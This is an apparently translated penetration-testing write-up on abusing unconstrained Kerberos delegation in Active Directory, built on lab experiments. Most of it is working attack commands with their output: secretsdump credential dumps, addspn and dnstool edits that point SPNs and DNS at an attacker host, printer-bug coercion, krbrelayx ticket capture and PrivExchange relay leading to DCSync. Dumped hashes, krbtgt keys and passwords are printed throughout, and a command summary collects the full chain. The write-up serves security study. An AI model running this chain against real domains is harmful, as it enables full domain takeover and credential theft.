Abusing Unconstrained Kerberos Delegation in Active Directory


This article is mainly a study of how Kerberos delegation can be abused in Active Directory.

It centers on three delegation types:

1. Unconstrained delegation (pre-2003)
2. Constrained delegation, introduced with 2003
3. Resource-based constrained delegation, introduced with 2012

First, let's look at abuse of unconstrained delegation.

How do we find targets with unconstrained delegation in the internal network?

PS C:\Users\Administrator\Desktop> Get-DomainComputer -Unconstrained -Properties useraccountcontrol,dnshostname

                                         useraccountcontrol dnshostname
                                         ------------------ -----------
               SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION DC01.isoon.cduestc
          WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION SERVER01.isoon.cduestc

You can also use ldapsearch:

ldapsearch -x -H ldap://10.0.0.9:389 -D "CN=itboy,CN=Users,DC=isoon,DC=cduestc" -w 123456aaA -b "DC=isoon,DC=cduestc" "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" |grep -iE "distinguishedName"

 

Any computer account whose UserAccountControl (UAC) attribute includes the TRUSTED_FOR_DELEGATION value is a viable target. You will always see domain controllers with this value, because it is the default setting for them. Domain controllers also carry the SERVER_TRUST_ACCOUNT UAC value, which makes them easy to distinguish from non-DCs. The real targets for domain privilege escalation are non-DC machines with the TRUSTED_FOR_DELEGATION UAC value, such as SERVER01.isoon.cduestc in the example above.
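As an added example (not part of the original post), the audit helper below applies the same userAccountControl bit logic as the ldapsearch filter above (matching rule 1.2.840.113556.1.4.803 with value 524288) and reports the non-DC computers that a defender should review; the entries are constructed to mirror the Get-DomainComputer output shown.

```python
# Audit helper: decode the userAccountControl bits the LDAP filter relies on
# and list non-DC computers trusted for unconstrained delegation.
TRUSTED_FOR_DELEGATION = 0x80000      # 524288, the value in the filter above
SERVER_TRUST_ACCOUNT = 0x2000         # set on domain controllers
WORKSTATION_TRUST_ACCOUNT = 0x1000    # set on member computers
SAM_MACHINE_ACCOUNT = 805306369       # samAccountType used in the filter

UAC_NAMES = {
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
}

def decode_uac(uac):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_NAMES.items() if uac & bit]

def ldap_bit_and(value, mask):
    """Mirror LDAP matching rule 1.2.840.113556.1.4.803: every bit in mask is set."""
    return (value & mask) == mask

def unconstrained_non_dcs(entries):
    """Apply the filter from the post, then drop DCs (which always carry the flag).
    entries: dicts with samAccountType, userAccountControl and dNSHostName."""
    hits = []
    for e in entries:
        if e["samAccountType"] != SAM_MACHINE_ACCOUNT:
            continue
        if not ldap_bit_and(e["userAccountControl"], TRUSTED_FOR_DELEGATION):
            continue
        if ldap_bit_and(e["userAccountControl"], SERVER_TRUST_ACCOUNT):
            continue  # a domain controller: expected, not a finding
        hits.append(e["dNSHostName"])
    return hits

# Constructed sample entries (not real directory data) mirroring the output above.
SAMPLE = [
    {"samAccountType": 805306369, "userAccountControl": 0x82000, "dNSHostName": "DC01.isoon.cduestc"},
    {"samAccountType": 805306369, "userAccountControl": 0x81000, "dNSHostName": "SERVER01.isoon.cduestc"},
    {"samAccountType": 805306369, "userAccountControl": 0x1000, "dNSHostName": "WS02.isoon.cduestc"},
    {"samAccountType": 805306368, "userAccountControl": 0x80200, "dNSHostName": ""},  # user account, skipped
]

if __name__ == "__main__":
    for e in SAMPLE:
        print(e["dNSHostName"] or "<user>", decode_uac(e["userAccountControl"]))
    print("review:", unconstrained_non_dcs(SAMPLE))
```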

Reproduction

Experiment 1: control the SPN attribute of the unconstrained-delegation machine (here we do not use the unconstrained-delegation machine itself, because that would require mimikatz or Rubeus to dump the cached tickets from the machine's lsass, which means executing code on the target machine. Doing it this way avoids one round of fighting the AV, but the traffic becomes obvious: less AV evasion, but more IDS defenses to get past, so there are pros and cons.)

 

Prerequisites

1. Privileges on the unconstrained-delegation machine (administrator rights, to dump hashes)
2. A machine running 2012 or later (my test on 2008 failed, which does not mean it is impossible on 2008)
3. The computer account has the Validated-MS-DS-Additional-DNS-Host-Name permission. My ordinary Server 2012 domain member did not have it by default (it is what lets you point DNS at the new SPN's host) (optional)

Step 1:

First we dump the hashes from the unconstrained-delegation machine we control.

root@kali:/home/peloader/krbrelayx# secretsdump.py web@server.7dap.club
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e6e31844f06a381e1bce39329f0aa6d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:940106a807c4ec5bb76719c4b6edf378:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
7DAP\SERVER$:aes256-cts-hmac-sha1-96:5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2
7DAP\SERVER$:aes128-cts-hmac-sha1-96:e1b34812778d5432c33f1be9b81dd4a5
7DAP\SERVER$:des-cbc-md5:ae1552c4df856162
7DAP\SERVER$:plain_password_hex:2b00720069002f00260044007800640061005c005b007400420079007100620040003b0028002500670073007900500022003500330035002b0043007600670041006e003d0053003f004d0024003d0067003c005c006b004e004a00590055003100330073002d006e003b00520021004e0071005f005c00700039005d00420071006a00650025007800250034005d002600480026006e0023003d00470036005400490043003900210057002300430045004b004a003d006300640055006000620055002c0031006e00750061007300770074004f00360049003400480028003b003900730032006f00200040005900
7DAP\SERVER$:aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x855b06cf8d2ff5f6e166de263f0d206a7d7ec2c5
dpapi_userkey:0xfae7e83d3d71c8394351ce98c5870a0cbb21bd5b
[*] NL$KM 
 0000   1F 5B 8D 3F 18 8A B0 83  87 E5 7A 03 A1 28 7D D4   .[.?......z..(}.
 0010   9A 1F 2E 6A AC AE 8E CB  85 D9 AD 0E A9 56 3D 57   ...j.........V=W
 0020   34 BD 02 05 D1 ED 52 0F  23 6D 46 18 72 F5 21 D8   4.....R.#mF.r.!.
 0030   87 C8 7E EF 5E D8 55 E9  05 CC D0 6F 5E 16 9E 3E   ..~.^.U....o^..>
NL$KM:1f5b8d3f188ab08387e57a03a1287dd49a1f2e6aacae8ecb85d9ad0ea9563d5734bd0205d1ed520f236d461872f521d887c87eef5ed855e905ccd06f5e169e3e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

The goal here is to obtain the machine hash and the Kerberos keys of the unconstrained-delegation machine.

Step 2

We add an SPN manually, using the toolkit from https://twitter.com/_dirkjan. The idea is that, after the server authenticates via Kerberos, the TGT obtained in the AS-REP exchange is used to access the SMB service on the attacker host, so by listening on the attacker host we capture this TGT and export it.

root@kali:/home/peloader/krbrelayx# python3 addspn.py -u 7dap.club\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -s HOST/attacker.7dap.club WIN-1EVBCK47T4G.7dap.club --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Step 3:

Now the SPN points at the attacker host, but DNS cannot resolve attacker.7dap.club. It turns out that Validated-MS-DS-Additional-DNS-Host-Name does not actually require a validated write permission to update the msDS-AdditionalDnsHostName attribute. The "Validated write to DNS host name" permission, enabled by default on computer objects, also allows us to write the msDS-AdditionalDnsHostName attribute and assign any hostname within the current domain to the computer object, after which the SPN is added automatically for that computer object.

root@kali:/home/peloader/krbrelayx# python3 dnstool.py -u 7dap\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -r attacker.7dap.club -d 10.1.1.133 --action add WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Step 4

We start krbrelayx in export mode and make the domain controller authenticate to us via the printer bug.

python3 krbrelayx.py -aesKey 5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2

We can see that it was obtained.

This gives us the domain controller account's krbtgt ticket, which means we now have DCSync rights.

root@kali:/home/peloader/krbrelayx# export KRB5CCNAME=WIN-1EVBCK47T4G\$@7DAP.CLUB_krbtgt@7DAP.CLUB.ccache
root@kali:/home/peloader/krbrelayx# secretsdump.py -k WIN-1EVBCK47T4G.7dap.club -just-dc
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ec7d16c3809ca64f2896f2d21564412:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:dc2dc1419e70f95658e847fbd8bb6bdf:::
dc:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
7dap.club\web:1108:aad3b435b51404eeaad3b435b51404ee:8143cc3e933cfa7c1e2fef31cfe21293:::
WIN-1EVBCK47T4G$:1002:aad3b435b51404eeaad3b435b51404ee:04ecb447e1ab0d298cccfc5f344775df:::
SERVER$:1109:aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:cb41215a7df69153f8e2bb519deee60af22b8272069cdc56d73a776a5cb334c4
krbtgt:aes128-cts-hmac-sha1-96:173cd5d54c6bdceff90ba3324f9e827f
krbtgt:des-cbc-md5:f72a2f51b0234cb0
7dap.club\web:aes256-cts-hmac-sha1-96:a102b386c82978dd9d54d839799b63b5ea99ecf408e159c662bb32e7b6abffee
7dap.club\web:aes128-cts-hmac-sha1-96:92b8e0e43b3112ebe80ec70d6528b551
7dap.club\web:des-cbc-md5:6b5e3b45251ca78a
WIN-1EVBCK47T4G$:aes256-cts-hmac-sha1-96:6e604ab1e46dfc1a799ecf5dff2b3aa9d5d567616a29fc0adef2dceb4932f54b
WIN-1EVBCK47T4G$:aes128-cts-hmac-sha1-96:ac467905925d51538871d4928d263f01
WIN-1EVBCK47T4G$:des-cbc-md5:018a135e4361f434
SERVER$:aes256-cts-hmac-sha1-96:5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2
SERVER$:aes128-cts-hmac-sha1-96:e1b34812778d5432c33f1be9b81dd4a5
SERVER$:des-cbc-md5:ae1552c4df856162
[*] Cleaning up... 

Experiment 2

Experiment 1 used addns (which easily triggers alerts) so that no hash extraction was needed on the server, but in a real engagement you need a listening machine that is usable inside the internal network, with root privileges. Compared with executing directly on the unconstrained-delegation machine, where you have to bypass AV to dump hashes but still have many ways to do so, here we simulate a real engagement and assume the compromised server1 is the machine with unconstrained delegation.

Prerequisite: privileges on a machine in the current domain that has unconstrained delegation

Used directly. Here I authenticate as a domain user; the machine hash can also be used, as above.

root@kali:/home/peloader/krbrelayx# python3 printerbug.py 7dap.club/web@WIN-1EVBCK47T4G.7dap.club server.7dap.club
[*] Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Attempting to trigger authentication via rprn RPC at WIN-1EVBCK47T4G.7dap.club
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

On the victim machine we listen with https://github.com/GhostPack/Rubeus

Use the toolkit from https://twitter.com/_dirkjan to trigger the printer bug and force the DC to authenticate to us.

Domain user authentication

root@kali:/home/peloader/krbrelayx# python3 printerbug.py 7dap.club/web@WIN-1EVBCK47T4G.7dap.club server.7dap.club
[*] Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Attempting to trigger authentication via rprn RPC at WIN-1EVBCK47T4G.7dap.club
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Domain machine authentication

root@kali:/home/peloader/krbrelayx# python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 7dap.club/server\$@WIN-1EVBCK47T4G.7dap.club server.7dap.club
[*] Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Attempting to trigger authentication via rprn RPC at WIN-1EVBCK47T4G.7dap.club
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

The DC's krbtgt ticket is obtained on the unconstrained-delegation machine we control.

We export it with mimikatz:

sekurlsa::tickets /export

We get the DC's krbtgt ticket.

Then import this ticket:

kerberos::ptt "[0;7a74f5]-2-0-40e10000-DC@krbtgt-7dap.club.kirbi"

After I finished importing, I checked klist on the local machine and the ticket was indeed there, but I did not have DCSync rights.

klist purge

Strangely, I had to open a new mimikatz in a new window before I could export (I don't understand why; discussion welcome).

Experiment 3: abusing service accounts and PrivExchange

Prerequisites

1. A user account password (here I obtained it by password spraying from a database)

2. Delegated control permission over the service account

Suppose the web user we control has been delegated permission to manage users in the Service Accounts OU, and we also find that the service account mssqler has a weak password, 123456Xx. This service account only has the SPN for the MSSQL service running on sqlservers.7dap.club. Since we want to escalate privileges through Exchange with PrivExchange, and PrivExchange connects over HTTP, we use this account to add a new SPN, http/priv.7dap.club.

root@kali:/home/peloader/krbrelayx# python3 addspn.py -u 7dap\\web -p 123456aaA1 -t mssqler -s http/priv.7dap.club -q WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=mssqler,CN=Users,DC=7dap,DC=club - STATUS: Read - READ TIME: 2021-03-02T21:13:42.376489
    sAMAccountName: mssqler
    servicePrincipalName: MSSQLSvc/sqlservers.7dap.club

root@kali:/home/peloader/krbrelayx# python3 addspn.py -u 7dap\\web -p 123456aaA1 -t mssqler -s http/priv.7dap.club WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

 

Here we again point DNS at our attacker IP.

root@kali:/home/peloader/krbrelayx# python3 dnstool.py -u 7dap\\web -p 123456aaA1 -r priv.7dap.club -d 10.0.1.133 --action add WIN-1EVBCK47T4G.7dap.club
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

 

 

Because we are using a user account here, the ticket will by default be encrypted with RC4, so we need to compute the NTLM hash of the password to decrypt it (we don't need to bother with the Kerberos salt here, since RC4 does not use it). This can be done with Python or directly in cmd.

import hashlib
# NT hash = MD4 over the UTF-16LE encoded password (OpenSSL 3 may need the legacy provider for md4)
print(hashlib.new('md4', '123456Xx'.encode('utf-16le')).hexdigest())

We first start krbrelayx.py again:

root@kali:/home/peloader/krbrelayx# python3 krbrelayx.py -hashes aad3b435b51404eeaad3b435b51404ee:d5dd1824ba147812b79836b7d7f5fc14 -t ldap://WIN-1EVBCK47T4G.7dap.club --escalate-user web
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in attack mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Then start privexchange.py (I ran into a problem here; solution 1: change http.client to requests; solution 2: the author's GitHub issue)

root@kali:/home/peloader/PrivExchange# python3 privexchange2.py -u web -p 123456aaA1 -ah priv.7dap.club Exc.7dap.club -d 7dap.club
INFO: Using attacker URL: http://priv.7dap.club/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
INFO: API call was successful

You may wonder here: why is the krbtgt ticket obtained for EXC, yet we end up with DCSync rights? If you're unsure, see here:

Domain penetration: using specific ACLs on the Exchange server to achieve domain privilege escalation

https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E4%BD%BF%E7%94%A8Exchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD%E7%89%B9%E5%AE%9A%E7%9A%84ACL%E5%AE%9E%E7%8E%B0%E5%9F%9F%E6%8F%90%E6%9D%83/

References

https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://github.com/dirkjanm/PrivExchange/issues/13

Command summary for this exercise

python3 printerbug.py 7dap.club/webadmin@WIN-1EVBCK47T4G.7dap.club attacker.7dap.club

python3 addspn.py -u 7dap.club\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -s HOST/attacker.7dap.club WIN-1EVBCK47T4G.7dap.club --additional
python3 dnstool.py -u 7dap.club\\server\$ -p aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 -r attacker.7dap.club -d 10.1.1.133 --action add WIN-1EVBCK47T4G.7dap.club
python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:06a160f1900e35671dfb51c563c58039 7dap.club/server\$@WIN-1EVBCK47T4G.7dap.club attacker.7dap.club
python3 krbrelayx.py -aesKey 5be6911f596e5d55caec8fa895fe761cc0b5e231c8f3adbbf2e82932264740c2
python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:dac034face472c4156e7889fcb8ca34f isoon.cduestc/Server01\$@DC1.isoon.cduestc Server01.isoon.cduestc
ldapsearch -x -H ldap://10.0.0.9:389 -D "CN=itboy,CN=Users,DC=isoon,DC=cduestc" -w 123456aaA -b "DC=isoon,DC=cduestc" "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" |grep -iE "distinguishedName"


python3 addspn.py -u 7dap\\mssqler -p 123456Xx -t MSSQLSvc -s http/priv.7dap.club -q WIN-1EVBCK47T4G.7dap.club

Get-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=7dap,DC=club" -properties sPNMappings
MSSQL/database.internal.corp



python3 krbrelayx.py -hashes aad3b435b51404eeaad3b435b51404ee:d5dd1824ba147812b79836b7d7f5fc14 -t ldap://WIN-1EVBCK47T4G.7dap.club --escalate-user web
python3 addspn.py -u 7dap\\mssqler -p 123456Xx -t MSSQLSvc -s http/priv.7dap.club -q WIN-1EVBCK47T4G.7dap.club

python addspn.py -u icorp\\helpdesk -p Welkom01 -t sqlserv -s http/evil.internal.corp icorp-dc.internal.corp
python3 addspn.py -u 7dap\\web -p 123456aaA1 -t mssqler -s http/priv.7dap.club WIN-1EVBCK47T4G.7dap.club

python3 dnstool.py -u 7dap\\web -p 123456aaA1 -r priv.7dap.club -d 10.0.1.133 --action add WIN-1EVBCK47T4G.7dap.club

python3 privexchange.py -u web -p 123456aaA1 -ah priv.7dap.club Exchange.7dap.club -d 7dap.club
